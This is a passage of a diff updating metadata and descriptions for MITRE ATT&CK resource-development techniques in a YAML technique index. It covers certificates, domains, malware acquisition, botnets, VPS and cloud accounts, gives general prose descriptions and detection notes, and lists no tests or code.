       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.004:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
-      type: attack-pattern
-      created: '2020-10-01T02:14:18.044Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.004
-        url: https://attack.mitre.org/techniques/T1588/004
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: Let's Encrypt FAQ
-        url: https://letsencrypt.org/docs/faq/
-        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
-          October 15, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.567Z'
       name: Digital Certificates
       description: |-
         Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -63420,18 +64069,49 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+      created: '2020-10-01T02:14:18.044Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/004
+        external_id: T1588.004
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Let's Encrypt FAQ
+        description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+          October 15, 2020.
+        url: https://letsencrypt.org/docs/faq/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1583.002:
     technique:
@@ -63453,7 +64133,7 @@ resource-development:
         url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
         description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
           be (ab)used by malicious actors. Retrieved October 3, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:49.702Z'
       name: DNS Server
       description: |-
         Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
@@ -63469,8 +64149,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -63492,7 +64170,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -63512,8 +64190,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -63552,7 +64228,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -63573,8 +64249,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -63604,7 +64278,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -63641,8 +64315,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -63664,7 +64336,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -63686,8 +64358,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -63724,7 +64394,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -63746,8 +64416,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -63809,7 +64477,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -63831,7 +64498,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -63849,8 +64516,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -63885,7 +64550,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -63904,33 +64569,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -63940,10 +64603,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -63951,9 +64623,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -64004,11 +64675,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -64021,7 +64691,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -64056,22 +64726,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -64092,7 +64765,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -64131,6 +64804,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -64186,7 +64863,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -64244,7 +64920,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -64324,7 +64999,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -64384,7 +65058,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -64406,7 +65079,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -64425,42 +65098,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -64469,22 +65110,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
